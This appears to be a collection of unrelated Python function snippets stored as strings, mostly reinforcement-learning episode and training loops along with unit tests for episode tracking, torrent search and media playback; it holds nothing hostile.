running_reward.append(reward)\n \n if play_as == 'X':\n running_reward = [-i for i in running_reward] \n \n performance = np.mean(running_reward)\n \n won = sum([1 if i == 1 else 0 for i in running_reward])\n lost = sum([1 if i == -1 else 0 for i in running_reward])\n draw = sum([1 if i == 0 else 0 for i in running_reward])\n \n #print(f\"Player : {play_as} | Performance : {performance} | Won: {won} | Lost: {lost} | Draw: {draw} | Total : {n_episodes}\")\n \n return (won,lost,draw)", "def play(self):\n p1 = self.player()\n p2 = axelrod.Player()\n p1.reset()\n p1.strategy(p2)\n # Genome contains only valid responses.\n self.assertEqual(p1.genome.count(C) + p1.genome.count(D), len(p1.genome))", "def stopEpisode(self):\n if self.episodesSoFar < self.numTraining:\n self.accumTrainRewards += self.episodeRewards\n else:\n self.accumTestRewards += self.episodeRewards\n self.episodesSoFar += 1\n if self.episodesSoFar >= self.numTraining:\n # Take off the training wheels\n self.epsilon = 0.0 # no exploration\n self.alpha = 0.0 # no learning", "def run_episode(self):\n # Reset environment\n self.agent.env.reset()\n done = False\n step_count = 0\n total_reward = 0\n\n while not done:\n reward, done = self.agent.explore()\n step_count += 1\n if step_count % 100 == 0:\n print('step count {}'.format(step_count))\n total_reward += self.agent.params['gamma']**step_count * reward\n return step_count, total_reward", "def _start_episode(self, test = False):\n self.env.true_reset()\n new_frame = self.env.reset()\n if not test:\n self.memory.add_experience(0, 0.0, new_frame, False)\n for i in range(self.num_stacked_frames):\n self._current_state[0, i] = new_frame\n new_frame, reward, done, _ = self.env.step(0)\n if not test:\n self.memory.add_experience(0, reward, new_frame, done)", "def stopEpisode(self):\n if self.episodesSoFar < self.numTraining:\n self.accumTrainRewards += self.episodeRewards\n else:\n self.accumTestRewards += self.episodeRewards\n self.episodesSoFar += 1\n if self.episodesSoFar >= self.numTraining:\n # Take off the training wheels\n self.epsilon = 1.0 # no exploration\n self.lr = 0.0 # no learning", "def test_download_specific_episode(self):\n episode = self._get_episode()\n torrent_filename = self.fetcher.download_specific_episode(episode)\n self.assertEqual(torrent_filename, FILENAME_2)", "def nukePlay():\n nuke.activeViewer().play(1)", "def test_save_unwatched_episodes(self):\n save_episodes(self.schedule.episodes)\n for show in FollowedShows.objects.filter(user_id=self.user.id):\n self.assertTrue(show.unwatchedepisode_set.all().count() > 0)", "def test_selecting_only_audio_episodes(\n only_audio_episodes: List[LepEpisode],\n) -> None:\n assert len(only_audio_episodes) == 14 # Without duplicates", "def play_game():\n pass", "def self_play(self, n_episodes): \n eps = self.eps(self.agent.learning_iters)\n experiences = self_play_episodes(self.mdp, self.agent, n_episodes, eps) \n for state, action, reward, next_state, done in experiences:\n self.agent.replay_buffer.push(state, action, reward, next_state, done)", "def test_episode_data(self):\n self.assertEquals(\n self.t['lost']['firstaired'],\n '2004-09-22'\n )", "def startEpisode(self):\n self.lastState = None\n self.lastAction = None\n self.episodeRewards = 0.0", "def explore(self, episode_count):\n # single agent, always use the `run_one_episode` api.\n # multi agent with `standalone` api_type, use the `run_one_episode` api.\n if self.env_info[\"api_type\"] == \"standalone\":\n # (use_explore, collect)\n _paras = [\n (True, False if _ag.alg.async_flag else True) for _ag in self.agents\n ]\n job_funcs = [agent.run_one_episode for agent in self.agents]\n for _epi_index in range(episode_count):\n _start2 = time()\n self.env.reset()\n for agent in self.agents:\n agent.reset()\n\n trajectory_list = self.bot.do_multi_job(job_funcs, _paras)\n for agent, trajectory in zip(self.agents, trajectory_list):\n if not agent.alg.async_flag:\n # self.trajectories.append(trajectory)\n self.send_explorer.send(trajectory)\n\n self._post_processes()\n self.ag_stats.explore_time_in_epi = time() - _start2\n\n if _epi_index == episode_count - 1:\n self.ag_stats.update_with_agent_stats(\n [agent.get_perf_stats() for agent in self.agents]\n )\n\n elif self.env_info[\"api_type\"] == \"unified\":\n for _ in range(episode_count):\n _start2 = time()\n trajectories = self._run_one_unified_episode(\n use_explore=True, collect=True)\n\n for _ag, trajectory in zip(self.agents, trajectories):\n if not _ag.alg.async_flag:\n # self.trajectories.append(trajectory)\n self.send_explorer.send(trajectory)\n\n self._post_processes()\n self.ag_stats.explore_time_in_epi = time() - _start2\n else:\n pass\n\n self.clear_trajectories()\n return self.ag_stats.get()", "def stopEpisode(self):\n if self.episodesSoFar < self.numTraining:\n self.accumTrainRewards += self.episodeRewards\n else:\n self.accumTestRewards += self.episodeRewards\n self.episodesSoFar += 1\n if self.episodesSoFar >= self.numTraining:\n # Take off the training wheels\n self.epsilon = 0.0 # no exploration\n self.alpha = 0.0 # no learning\n\n print(\"Agent Stop Episode\")\n print(self.episodeRewards)\n for feature, weight in self.weights.iteritems():\n print(\"\\t\" + str(feature) + \" - \" + str(weight))\n self.episodeRewardsList.append(self.episodeRewards)", "def play(self):\n pass", "def run_episode(env, agent, deterministic, do_training=True, rendering=False, max_timesteps=1000):\n\n stats = EpisodeStats() # save statistics like episode reward or action usage\n state = env.reset()\n\n step = 0\n while True:\n\n action_id = agent.act(state=state, deterministic=deterministic)\n next_state, reward, terminal, info = env.step(action_id)\n\n if do_training:\n agent.train(state, action_id, next_state, reward, terminal)\n\n state = next_state\n\n # # NOTE reward shaping...\n # if terminal:\n # reward += -1\n # if step < 20:\n # reward += -10\n # if step > 100:\n # reward += 10\n\n stats.step(reward, action_id)\n\n if rendering:\n env.render()\n\n if terminal or step > max_timesteps:\n break\n\n step += 1\n\n return stats", "def test_atomic_update_episode(self):\n episode = self._create_sample_episode()\n study_id, session_id, episode_id = (episode.study_id, episode.session_id,\n episode.id)\n\n def callback(read_episode):\n # Read episode should match the stored one.\n self.assertEqual(read_episode, episode)\n self.assertEqual(read_episode.num_steps, 100)\n # Make a change.\n read_episode.num_steps = 200\n return True\n\n self.assertTrue(\n self.storage.atomic_update_episode(study_id, session_id, episode_id,\n callback))\n # Check that the change was applied.\n episode.num_steps = 200\n self.assertEqual(\n self.storage.get_episode(study_id, session_id, episode_id), episode)", "def train(self, max_episodes= 1000, eps_start=1.0, eps_end=0.01, eps_decay=0.995):\n success = False\n i_episode = 0\n eps = eps_start\n \n print('Training in progress...')\n for i in range(max_episodes):\n score = self.run_training_episode(eps=eps)\n \n self.score_window.append(score)\n self.score_record.append(np.mean(self.score_window))\n \n i_episode += 1\n eps = max(eps_end, eps_decay*eps) # decrease epsilon\n\n if i_episode%100 == 0:\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, self.score_record[-1]))\n \n if i_episode>100:\n if np.mean(self.score_window)>self.criteria:\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, self.score_record[-1]))\n success = True\n break\n\n if success:\n print('Criteria reached after {} episodes'.format(i_episode))\n else:\n print('Failed to reach Criteria after {} episodes'.format(i_episode))\n\n self.plot_training_progress()\n return success", "def run_episode(env, agent, deterministic, skip_frames=0, do_training=True, rendering=True, max_timesteps=10000,\n history_length=0, manual=False):\n\n stats = utils.EpisodeStats()\n\n # Save history\n image_hist = []\n\n step = 0\n state = env.reset()\n\n env.viewer.window.on_key_press = utils.key_press\n env.viewer.window.on_key_release = utils.key_release\n # fix bug of corrupted states without rendering in gym environment\n env.viewer.window.dispatch_events()\n\n # append image history to first state\n state = state_preprocessing(state)\n image_hist.extend([state] * (history_length + 1))\n state = np.array(image_hist).reshape(96, 96, history_length + 1)\n while True:\n #skip intro zoom frames\n if step < 48:\n step += 1\n env.step(utils.id_to_action(0))\n continue\n \n # TODO: get action_id from agent\n # Hint: adapt the probabilities of the 5 actions for random sampling so that the agent explores properly.\n if do_training and manual:\n action_id = utils.manual_action\n else:\n action_id = agent.act(state, deterministic)\n action = utils.id_to_action(action_id)\n\n # Hint: frame skipping might help you to get better results.\n reward = 0\n for _ in range(skip_frames + 1):\n next_state, r, terminal, info = env.step(action)\n reward += r\n\n if rendering:\n env.render()\n\n if terminal:\n break\n\n next_state = state_preprocessing(next_state)\n \n image_hist.append(next_state)\n image_hist.pop(0)\n next_state = np.array(image_hist).reshape(96, 96, history_length + 1)\n\n if do_training and (next_state[:82, :, -1].sum() > 5000): #track out of sight\n print('Track gone; finish this episode')\n agent.add(state, action_id, next_state, reward=-(skip_frames + 1), terminal=True) #punish\n break\n\n if do_training:\n agent.add(state, action_id, next_state, reward, terminal)\n if not manual:\n agent.train()\n\n stats.step(reward, action_id)\n\n state = next_state\n \n if terminal or (step * (skip_frames + 1)) > max_timesteps:\n break\n\n step += 1\n\n return stats", "def test_search_torrent(self):\n episode = self._get_episode()\n search_results = self.fetcher.jackett.search(episode.indexed_name)\n best_result = self.fetcher.best_search_result(search_results)\n self.assertEqual(best_result.get(\"id\"), 2)", "def test_search_torrent(self):\n episode = self._get_episode()\n search_results = self.fetcher.jackett.search(episode.indexed_name)\n best_result = self.fetcher.best_search_result(search_results)\n self.assertEqual(best_result.get(\"id\"), 2)", "def run_episode(env, gamma = 1.0, render = False):\n actions = 4\n obs = env.reset()\n total_reward = 0\n step_idx = 0\n\n while True:\n if render:\n env.render()\n obs, reward, done , _ = env.step(random.randint(0, actions - 1))\n x1, x2, x3, x4, x5, x6, x7, x8 = obs\n x1s.append(x1)\n x2s.append(x2)\n x3s.append(x3)\n x4s.append(x4)\n x5s.append(x5)\n x6s.append(x6)\n x7s.append(x7)\n x8s.append(x8)\n total_reward += (gamma ** step_idx * reward)\n step_idx += 1\n if done:\n break\n return total_reward, step_idx", "def _run_single(self, thread_id, agent, environment, deterministic=False,\n max_episode_timesteps=-1, episode_finished=None, testing=False, sleep=None):\n\n # figure out whether we are using the deprecated way of \"episode_finished\" reporting\n old_episode_finished = False\n if episode_finished is not None and len(getargspec(episode_finished).args) == 1:\n old_episode_finished = True\n\n episode = 0\n # Run this single worker (episode loop) as long as global count thresholds have not been reached.\n while not self.should_stop:\n state = environment.reset()\n agent.reset()\n self.global_timestep, self.global_episode = agent.timestep, agent.episode\n episode_reward = 0\n\n # Time step (within episode) loop\n time_step = 0\n time_start = time.time()\n while True:\n action, internals, states = agent.act(states=state, deterministic=deterministic, buffered=False)\n reward = 0\n for repeat in xrange(self.repeat_actions):\n state, terminal, step_reward = environment.execute(action=action)\n reward += step_reward\n if terminal:\n break\n\n if not testing:\n # agent.observe(reward=reward, terminal=terminal)\n # Insert everything at once.\n agent.atomic_observe(\n states=state,\n actions=action,\n internals=internals,\n reward=reward,\n terminal=terminal\n )\n\n if sleep is not None:\n time.sleep(sleep)\n\n time_step += 1\n episode_reward += reward\n\n if terminal or time_step == max_episode_timesteps:\n break\n\n # Abort the episode (discard its results) when global says so.\n if self.should_stop:\n return\n\n self.global_timestep += time_step\n\n # Avoid race condition where order in episode_rewards won't match order in episode_timesteps.\n self.episode_list_lock.acquire()\n self.episode_rewards.append(episode_reward)\n self.episode_timesteps.append(time_step)\n self.episode_times.append(time.time() - time_start)\n self.episode_list_lock.release()\n\n if episode_finished is not None:\n # old way of calling episode_finished\n if old_episode_finished:\n summary_data = {\n \"thread_id\": thread_id,\n \"episode\": episode,\n \"timestep\": time_step,\n \"episode_reward\": episode_reward\n }\n if not episode_finished(summary_data):\n return\n # New way with BasicRunner (self) and thread-id.\n elif not episode_finished(self, thread_id):\n return\n\n episode += 1", "def send_music_play_event_and_validate(self):\n play_detection_timeout = 1\n if self.dut.is_streaming():\n self.logger.info('Music already streaming. Skipping play event..')\n return\n self.logger.info('Playing video...')\n is_played = self.dut.music_control_events(\n AVRCPSTATUS, self.dut.apollo_log_regex.AVRCP_PLAY_REGEX)\n if not is_played:\n self.logger.error('AVRCP Played status not found')\n raise TestActsError('AVRCP Played status not found.')\n wait_until(\n lambda: self.dut.is_streaming(),\n play_detection_timeout,\n sleep_s=0.25)\n if not self.dut.is_streaming():\n self.logger.error('Device is NOT in a deviceA2DPStreaming state')\n raise TestActsError(\n 'Device is NOT in a deviceA2DPStreaming state.')", "def play_one_episode(self, func, stat='score'):\n if not isinstance(stat, list):\n stat = [stat]\n while True:\n s = self.current_state()\n act = func(s)\n act, r, isOver = self.action(act)\n # print r\n if isOver:\n s = [self.stats[k] for k in stat]\n self.reset_stat()\n return s if len(s) > 1 else s[0]", "def test_atomic_update_episode_no_update(self):\n episode = self._create_sample_episode()\n study_id, session_id, episode_id = (episode.study_id, episode.session_id,\n episode.id)\n\n def callback(read_episode):\n # Make a change but return false.\n read_episode.num_steps = 200\n return False\n\n self.assertFalse(\n self.storage.atomic_update_episode(study_id, session_id, episode_id,\n callback))\n self.assertEqual(\n self.storage.get_episode(study_id, session_id, episode_id), episode)", "def on_train_begin(self, logs):\n print(f\"Testing for {self.params['nb_episodes']} episodes ...\")", "def begin_episode(self, observation):\n self._reset_state()\n self._record_observation(observation)\n\n if not self.eval_mode:\n self._train_step()\n\n self._rng, self.action = select_action(self.network_def,\n self.online_params,\n self.state,\n self._rng,\n self.num_actions,\n self.eval_mode,\n self.epsilon_eval,\n self.epsilon_train,\n self.epsilon_decay_period,\n self.training_steps,\n self.min_replay_history,\n self.epsilon_fn)\n self.action = onp.asarray(self.action)\n return self.action", "def begin_episode(self, observation):\n self._reset_state()\n self._record_observation(observation)\n\n if not self.eval_mode:\n self._train_step()\n\n self._rng, self.action = select_action(self.network_def,\n self.online_params,\n self.state,\n self._rng,\n self.num_quantile_samples,\n self.num_actions,\n self.eval_mode,\n self.epsilon_eval,\n self.epsilon_train,\n self.epsilon_decay_period,\n self.training_steps,\n self.min_replay_history,\n self.epsilon_fn,\n self._tau,\n self.optimizer)\n self.action = onp.asarray(self.action)\n return self.action", "def run(agent, env, num_episodes = 20000, mode = 'train'):\n\t scores=[]\n\t max_avg_score=-np.inf\n\t for i_episode in range(1, num_episodes + 1):\n\t # Initialize episode\n\t state=env.reset()\n\t action=agent.reset_episode(state)\n\t total_reward=0\n\t done=False\n\n\t # Roll out steps until done\n\t while not done:\n\t state, reward, done, info=env.step(action)\n\t total_reward += reward\n\t action=agent.act(state, reward, done, mode)\n\n\t # Save final score\n\t scores.append(total_reward)\n\n\t # Print episode stats\n\t if mode == 'train':\n\t if len(scores) > 100:\n\t avg_score=np.mean(scores[-100:])\n\t if avg_score > max_avg_score:\n\t max_avg_score=avg_score\n\n\t if i_episode % 100 == 0:\n\t print(\"\\rEpisode {}/{} | Max Average Score: {}\".format(i_episode,\n\t num_episodes, max_avg_score), end = \"\")\n\t sys.stdout.flush()\n\n\t return scores\n\n\tscores=run(q_agent, env)\n\n\t# Plot scores obtained per episode\n\tplt.plot(scores); plt.title(\"Scores\")\n\n\tdef plot_scores(scores, rolling_window = 100):\n\t\t\"\"\"Plot scores and optional rolling mean using specified window.\"\"\"\n\t\tplt.plot(scores); plt.title(\"Scores\");\n\t\trolling_mean=pd.Series(scores).rolling(rolling_window).mean()\n\t\tplt.plot(rolling_mean);\n\t\treturn rolling_mean\n\n\trolling_mean=plot_scores(scores)\n\n\t# Run in test mode and analyze socres obtained\n\ttest_scores=run(q_agent, env, num_episodes = 100, mode = 'test')\n\tprint(\"[TEST] Completed {} episodes with avg. score = {}\".format(\n\t len(test_scores), np.mean(test_scores)))\n\t_=plot_scores(test_scores, rolling_window = 10)\n\n\n\tdef plot_q_table(q_table):\n \"\"\"Visualize max Q-value for each state and corresponding action.\"\"\"\n\t q_image=np.max(q_table, axis = 2) # max Q-value for each state\n\t q_actions=np.argmax(q_table, axis = 2) # best action for each state\n\n\t fig, ax=plt.subplots(figsize = (10, 10))\n\t cax=ax.imshow(q_image, cmap = 'jet');\n\t cbar=fig.colorbar(cax)\n\t for x in range(q_image.shape[0]):\n\t for y in range(q_image.shape[1]):\n\t ax.text(x, y, q_actions[x, y], color = 'white',\n\t horizontalalignment = 'center', verticalalignment = 'center')\n\t ax.grid(False)\n\t ax.set_title(\"Q-table, size: {}\".format(q_table.shape))\n\t ax.set_xlabel('position')\n\t ax.set_ylabel('velocity')\n\n\n\tplot_q_table(q_agent.q_table)\n\n\n\tstate_grid_new=create_uniform_grid(\n\t env.observation_space.low, env.observation_space.high, bins = (20, 20))\n\tq_agent_new=QLearningAgent(env, state_grid_new)\n\tq_agent_new.scores=[]\n\n\n\tq_agent_new.scores += run(q_agent_new, env,\n\t num_episodes = 50000) # accumulate scores\n\trolling_mean_new=plot_scores(q_agent_new.scores)\n\n\ttest_scores= run(q_agent_new, env, num_episodes = 100, mode = 'test')\n\tprint(\"[TEST] Completed {} episodes with avg. score = {}\".format(\n\t len(test_scores), np.mean(test_scores)))\n\t_=plot_scores(test_scores)\n\n\tplot_q_table(q_agent_new.q_table)\n\n\tstate=env.reset()\n\tscore=0\n\timg=plt.imshow(env.render(mode='rgb_array'))\n\tfor t in range(1000):\n\t\taction=q_agent_new.act(state, mode = 'test')\n\t\timg.set_data(env.render(mode='rgb_array'))\n\t\tplt.axis('off')\n\t\tdisplay.display(plt.gcf())\n\t\tdisplay.clear_output(wait = True)\n\t\tstate, reward, done, _=env.step(action)\n\t\tsocre += reward\n\t\tif done:\n\t\t\tprint('Score: ', socre)\n\t\t\tbreak\n\tenv.close()", "def begin_episode(self, observation: np.ndarray, a: int) -> int:\n del observation\n del a\n return -1", "def test_start(self):\n magic_hat = Game()\n result = Game.start(magic_hat)\n self.assertEqual(result, game.STATUS_PLAYING)", "def test_atomic_update_missing_episode(self):\n\n def callback(unused_episode):\n # Callback should not be called.\n assert False\n\n self.assertFalse(\n self.storage.atomic_update_episode('study', 'session', 'missing',\n callback))", "def execute_and_get_episodes(self, num_episodes, max_timesteps_per_episode=0, deterministic=False):\n pass", "def run_episode(self, environment):\n state = environment.reset()\n self.steps_done = 0\n while True:\n state_tensor = FloatTensor([state])\n position = self.Q.sample_from_softmax_policy(state_tensor)\n action = position + 1\n next_state, reward, done, _ = environment.step(position.item())\n self.memory.push((state_tensor, action,))\n self.learn(state_tensor, action, next_state, reward)\n state = next_state\n self.steps_done += 1\n if done:\n break\n history = environment.close()\n return history", "def test_delete_episode(self):\n episode = self._create_sample_episode()\n study_id, session_id, episode_id = (episode.study_id, episode.session_id,\n episode.id)\n self.assertIsNotNone(\n self.storage.get_episode(study_id, session_id, episode_id))\n\n self.assertTrue(\n self.storage.delete_episode(episode.study_id, episode.session_id,\n episode.id))\n self.assertIsNone(\n self.storage.get_episode(study_id, session_id, episode_id))", "def podcast_show(url, name):\n for recording in scraper.get_podcast_episodes(url):\n INTERFACE.add_item(recording['title'],\n 'play_podcast',\n recording['url'],\n extra_info=recording)", "def test_save_repeat_unwatched_episodes_should_not_be(self):\n episode = self.schedule.episodes[0]\n all_episodes = self.schedule.episodes\n followed_show = FollowedShows.objects.get(user=self.user, show_id=episode.show.id)\n UnwatchedEpisode(\n followed_show=followed_show,\n episode_id=episode.id,\n episode_name=episode.name,\n season=episode.season,\n episode_number=episode.number or 0,\n air_date=episode.airdate,\n air_time=episode.airtime,\n air_stamp=episode.airstamp,\n summary=episode.summary or \"no summary\"\n ).save()\n save_episodes(self.schedule.episodes)\n # make sure all episodes are saved to both users unwatched episodes despite the integrity error in bulk_create\n self.assertEqual(len(all_episodes) * 2, len(UnwatchedEpisode.objects.all()))", "def execute_episodes(self, num_episodes, max_timesteps_per_episode=0, update_spec=None, deterministic=False):\n pass", "def _update_episode(self):\n if self.episode_num > 0:\n self._publish_reward_topic(\n self.accumulated_episode_reward,\n self.episode_steps,\n self.episode_num\n )\n\n self.episode_num += 1\n self.accumulated_episode_reward = 0\n self.episode_steps = 0", "def _create_sample_episode(self) -> study_pb2.Episode:\n study_id, session_id = self.init_session()\n episode = sample_episode(study_id=study_id, session_id=session_id)\n self.storage.create_episode(episode)\n return episode", "def run(self):\n # Observe the game by randomly sampling actions from the environment\n # and performing those actions\n self.__observe__()\n for i in xrange(self.num_epochs):\n self.environment.resetStatistics()\n time_now = time.time()\n for j in xrange(self.train_steps_per_epoch):\n # Get action using epsilon-greedy strategy\n action = self.__sample_epsilon_action__()\n # Perform action based on epsilon-greedy search and store the transitions\n # in experience replay\n self.__supply_action_to_environment__(action)\n # If the environment is in the terminal state, reset the environment, and\n # perform self.stack_num actions to reset the environment\n self.isGameOver()\n if j % self.train_frequency == 0:\n # print \"Started training\"\n # Sample minibatch of size self.minibatch_size from experience replay\n minibatch = self.experience_replay.sample()\n minibatch_states, minibatch_action, minibatch_reward, minibatch_next_states, \\\n minibatch_terminals = minibatch\n cost = self.network.train_network(minibatch_states,\n minibatch_action,\n minibatch_reward,\n minibatch_terminals,\n minibatch_next_states)\n if j % self.record_frequency == 0:\n total_score, num_games = self.environment.getStatistics()\n avg_score = total_score / num_games\n self.network.record_average_qvalue(\n self.experience_replay.getCurrentState(),\n i * self.train_steps_per_epoch + j,\n self.epsilon, avg_score)\n # Epsilon annealing\n self.__anneal_epsilon__()\n # if self.time_step % 1000 == 0:\n # print \"Cost at iteration\", self.time_step, \" is\", cost\n # print \"Value of epsilon is\", self.epsilon\n self.steps += 1\n if j % self.copy_steps == 0:\n self.network.copy_weights()\n total_score, num_games = self.environment.getStatistics()\n time_taken = (time.time() - time_now)\n logger.info(\"Finished epoch %d: Steps=%d; Time taken=%.2f\",\n i, j, time_taken)\n logger.info(\"\\tNumber of games: %d; Average reward: %.2f\", num_games, (total_score / num_games))\n logger.info(\"\\tFinal epsilon value for epoch: %f\", self.epsilon)\n self.network.create_checkpoint()", "def trainOneEpisode(self, num_episodes, max_episode_steps=100, save_freq=100, render=False):\n # tqdm.write('------Episode {} / {}------'.format(self.episodes_done, num_episodes))\n self.resetEnv()\n r_total = 0\n with trange(1, max_episode_steps+1, leave=False) as t:\n\n for step in t:\n if render:\n self.env.render()\n state = self.state\n action, q = self.selectAction(state, require_q=True)\n obs_, r, done, info = self.takeAction(action.item())\n # if print_step:\n # print 'step {}, action: {}, q: {}, reward: {} done: {}' \\\n # .format(step, action.item(), q, r, done)\n r_total += r\n # t.set_postfix(step='{:>5}'.format(step), q='{:>5}'.format(round(q, 4)), total_reward='{:>5}'.format(r_total))\n t.set_postfix_str('step={:>5}, q={:>5}, total_reward={:>5}'.format(step, round(q, 2), r_total))\n if done or step == max_episode_steps:\n next_state = None\n else:\n next_state = self.getNextState(obs_)\n reward = torch.tensor([r], device=self.device, dtype=torch.float)\n self.memory.push(state, action, next_state, reward)\n self.optimizeModel()\n if self.steps_done % self.target_update == 0:\n self.target_net.load_state_dict(self.policy_net.state_dict())\n\n if done or step == max_episode_steps - 1:\n tqdm.write('------Episode {} ended, total reward: {}, step: {}------' \\\n .format(self.episodes_done, r_total, step))\n tqdm.write('------Total steps done: {}, current e: {} ------' \\\n .format(self.steps_done, self.exploration.value(self.steps_done)))\n # print '------Episode {} ended, total reward: {}, step: {}------' \\\n # .format(self.episodes_done, r_total, step)\n # print '------Total steps done: {}, current e: {} ------' \\\n # .format(self.steps_done, self.exploration.value(self.steps_done))\n self.episodes_done += 1\n self.episode_rewards.append(r_total)\n self.episode_lengths.append(step)\n if self.episodes_done % save_freq == 0:\n self.saveCheckpoint()\n break\n self.state = next_state", "async def discover(loop, artwork=False, hosts=None):\n if hosts:\n discovered = await pyatv.scan(loop, hosts=hosts, timeout=5)\n else:\n discovered = await pyatv.scan(loop, timeout=5)\n atvs = []\n\n for device in discovered:\n atv = {}\n atv['playing'] = False\n\n atv['name'] = device.name\n atv['address'] = device.address\n atv['identifier'] = device.identifier\n atv['device_type'] = 'apple-tv'\n\n for service in device.services:\n if service.protocol.name == 'MRP':\n try:\n connect_device = await pyatv.connect(device, loop)\n now_playing = await connect_device.metadata.playing()\n # 'album', 'artist', 'device_state', 'genre', 'hash', 'media_type', 'position', 'repeat', 'shuffle', 'title', 'total_time'\n if 'idle' not in str(now_playing.device_state).lower():\n atv['now_playing'] = now_playing.title\n atv['playing'] = True\n\n if 'paused' in str(now_playing.device_state).lower():\n atv['playing'] = 'Paused'\n\n if now_playing.total_time:\n atv['playing_percent'] = (now_playing.position / now_playing.total_time) * 100\n\n atv['current_position'] = now_playing.position\n atv['time_remaining'] = now_playing.total_time - now_playing.position\n atv['total_time'] = now_playing.total_time\n \n # print('current: ' + str(now_playing.position))\n # print('total: ' + str(now_playing.total_time))\n # print(str(atv['playing_percent']))\n elif now_playing.position and not now_playing.total_time:\n atv['playing_percent'] = 200\n\n ## TO DO Artwork\n # if artwork:\n # artwork = await connect_device.metadata.artwork()\n # print(artwork)\n\n finally:\n await connect_device.close()\n atvs.append(atv)\n\n return atvs", "def play_episode(env, policy, render_option, min_steps):\n state = env.reset()\n done = False\n episode_reward = 0.0\n step_cnt = 0\n while not done or step_cnt < min_steps:\n if render_option == 'collect':\n env.render()\n action = policy(state)\n next_state, reward, done, _ = env.step(action)\n episode_reward += reward\n state = next_state\n step_cnt += 1\n print('episode finished with reward {0}'.format(episode_reward))\n return episode_reward", "def play(self):\r\n self.perform_strategy()", "def test_songs_played(self):\n self.assertEqual(self.show.song_booleans, {\n 'you-enjoy-myself': 1,\n 'tweezer': 0\n })", "def test(config, alg, checkpoint=None, testdelay=0, render=False, envcreator=None, maxepisodelen=10000000):\n if alg == \"random\":\n env = envcreator()\n else:\n agent = get_agent_class(alg)(config=config, env=\"retro-v0\")\n if checkpoint is None:\n raise ValueError(f\"A previously trained checkpoint must be provided for algorithm {alg}\")\n agent.restore(checkpoint)\n env = agent.local_evaluator.env\n\n while True:\n state = env.reset()\n done = False\n reward_total = 0.0\n step = 0\n while not done and step < maxepisodelen:\n if alg == \"random\":\n action = np.random.choice(range(env.action_space.n))\n else:\n action = agent.compute_action(state)\n next_state, reward, done, _ = env.step(action)\n time.sleep(testdelay)\n reward_total += reward\n if render:\n env.render()\n state = next_state\n step = step + 1\n print(\"Episode reward\", reward_total)", "def test_play(self):\n self.assertTrue(len(self.player.valid_callers)>0)\n \"\"\"...and should allow round_robin.play to call\"\"\"\n self.assertTrue(\"play\" in self.player.valid_callers)\n self.play()\n self.play()", "def play(self, n_episodes=100, max_episode_length=3000, load_path=\"last_save.h5\"):\n\n self.explore = False # Explore if needed\n\n self._play_through(n_episodes=n_episodes, max_episode_length=max_episode_length, load_path=load_path,\n callbacks=self._play_callbacks_factory())", "def on_episode_start(self, agent, **kwargs):\n self.episode_start[agent.brain.episode] = timeit.default_timer()\n self.observations[agent.brain.episode] = []\n self.rewards[agent.brain.episode] = []\n self.actions[agent.brain.episode] = []\n self.metrics[agent.brain.episode] = {}", "def track_03():\n sonos.play_uri('http://nrj.de/sachsen', title='Energy Sachsen', force_radio=True)\n return \"Ok\"", "def test_runGame(self):\n # this is tested by playing the game. No good way to unit test this.\n pass", "def run_aqi(self):\r\n while True:\r\n self.get_aqi()\r\n time.sleep(30 - time.time() % 30)", "def media_episode(self):\n media_status = self._media_status()[0]\n return media_status.episode if media_status else None", "def evaluate(self, env, num_episodes, max_episode_length=None\n , show_detail = False):\n episode_counter = 1;\n average_reward = 0;\n average_episode_length = 0;\n time_this, ob_this, is_terminal = env.reset()\n\n ob_this = self._preprocessor.process_observation(time_this, ob_this)\n\n obs_this_net = self._preprocessor.process_observation_for_network(\n ob_this, self._min_array, self._max_array)\n\n state_this_net = np.append(obs_this_net[0:13], obs_this_net[14:]).reshape(1,16)\n setpoint_this = ob_this[6:8]\n \n this_ep_reward = 0;\n this_ep_length = 0;\n while episode_counter <= num_episodes:\n action_mem = self.select_action(state_this_net, stage = 'testing');\n # covert command to setpoint action \n action = self._policy.process_action(setpoint_this, action_mem)\n\n time_next, ob_next, is_terminal = env.step(action)\n \n ob_next = self._preprocessor.process_observation(time_next, ob_next)\n\n setpoint_next = ob_next[6:8]\n\n obs_next_net = self._preprocessor.process_observation_for_network(\n ob_next, self._min_array, self._max_array)\n \n state_next_net = np.append(obs_next_net[0:13], obs_next_net[14:]).reshape(1,16)\n \n #10:PMV, 11: Occupant number , -2: power\n reward = self._preprocessor.process_reward(obs_next_net[12:15])\n \n this_ep_reward += reward;\n \n #Check if exceed the max_episode_length\n if max_episode_length is not None and \\\n this_ep_length >= max_episode_length:\n is_terminal = True;\n #Check whether to start a new episode\n if is_terminal:\n time_this, ob_this, is_terminal = env.reset()\n ob_this = self._preprocessor.process_observation(time_this, ob_this)\n setpoint_this = ob_this[6:8]\n obs_this_net = self._preprocessor.process_observation_for_network(\n ob_this, self._min_array, self._max_array)\n\n state_this_net = np.append(obs_this_net[0:13], \n obs_this_net[14:]).reshape(1,16)\n\n average_reward = (average_reward * (episode_counter - 1) \n + this_ep_reward) / episode_counter;\n average_episode_length = (average_episode_length \n * (episode_counter - 1) \n + this_ep_length) / episode_counter;\n \n episode_counter += 1;\n if show_detail:\n logging.info ('Episode ends. Cumulative reward is %0.04f '\n 'episode length is %d, average reward by now is %0.04f,'\n ' average episode length by now is %d.' %(this_ep_reward,\n this_ep_length,\n average_reward,\n average_episode_length));\n this_ep_length = 0;\n this_ep_reward = 0;\n \n else:\n ob_this = ob_next\n setpoint_this = setpoint_next\n state_this_net = state_next_net\n time_this = time_next\n this_ep_length += 1;\n return (average_reward, average_episode_length);", "def executeEpisode(self, mcts, game, args):\n trainExamples = []\n board = game.getInitBoard()\n curPlayer = 1\n episodeStep = 0\n state_counter = Counter()\n\n moves = 0\n\n while True:\n episodeStep += 1\n canonicalBoard = game.getCanonicalForm(board, curPlayer)\n temp = int(episodeStep < self.args['tempThreshold'])\n\n pi = mcts.getActionProb(canonicalBoard, temp=temp)\n sym = game.getSymmetries(canonicalBoard, pi)\n for b, p in sym:\n trainExamples.append([b, curPlayer, p, None])\n\n action = np.random.choice(len(pi), p=pi)\n state_counter.update(game.stringRepresentation(board)) #count the visit to the board\n\n board, curPlayer = game.getNextState(board, curPlayer, action)\n\n r = game.getGameEnded(board, curPlayer)\n \n moves += 1\n\n if moves >= self.args['maxMoves']:\n r = 1e-4\n\n if r != 0:\n return ([(x[0], x[2], r * ((-1) ** (x[1] != curPlayer))) for x in trainExamples], state_counter)", "def run(self):\n self.ae.start()", "def test(net, env, total_episodes, 